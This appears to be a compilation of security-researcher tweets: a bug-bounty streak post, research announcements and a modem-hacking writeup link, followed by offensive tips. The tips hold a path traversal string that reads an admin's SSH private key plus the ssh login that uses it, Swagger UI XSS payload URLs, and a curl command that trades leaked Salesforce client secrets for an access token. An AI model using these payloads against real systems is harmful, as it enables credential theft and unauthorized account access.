36-month streak on Hackerone through agonizing pain that doesn't stop (not even long enough to sleep), medication-induced brain fog and depression. Proud of what I built under these conditions. The streak may be ending, but what it represents isn't.
Late last month, @SLCyberSec Security Researchers Adam Kues (@hashkitten) and Dylan Pindur presented on Finding Critical Vulnerabilities in Adobe Experience Manager at @BSidesCBR. Today, we’re releasing our research post and presentation slides: https://t.co/phzQWUJgCP.
New writeup:
"Hacking Millions of Modems (and Investigating Who Hacked My Modem)"
https://t.co/VZbWEIF5I8
Thanks for reading! Huge thanks to @blastbots, @bbuerhaus, @infosec_au, @d0nutptr, @iangcarroll, and everyone who reviewed the post beforehand.
Getting the maximum impact :
read the SSH PRIVATE KEY:
aCSHELL/../../../../../../../home/admin/.ssh/id_rsa
connect to the server :
ssh [email protected] -i id_rsa
If you finds any Swagger ui endpoint try following payloads for xss+html injection.
/index.html?configUrl=https://t.co/BCj67bsP36
/index.html?configUrl=https://t.co/ZNdLs70Fa4
/index.html?config=https://t.co/bUa05PuwQf
/index.html?configUrl=https://t.co/hJKPHCQ4ze
search in the same repo for client ID&Secret
then
curl https://login.salesforce[.]com/services/oauth2/token -d 'grant_type=password&client_id=ID&client_secret=SECRET&username=USER&password=PASSWORD' -H "X-PrettyPrint: 1"
==> access token
Full Access Via Backend
2/2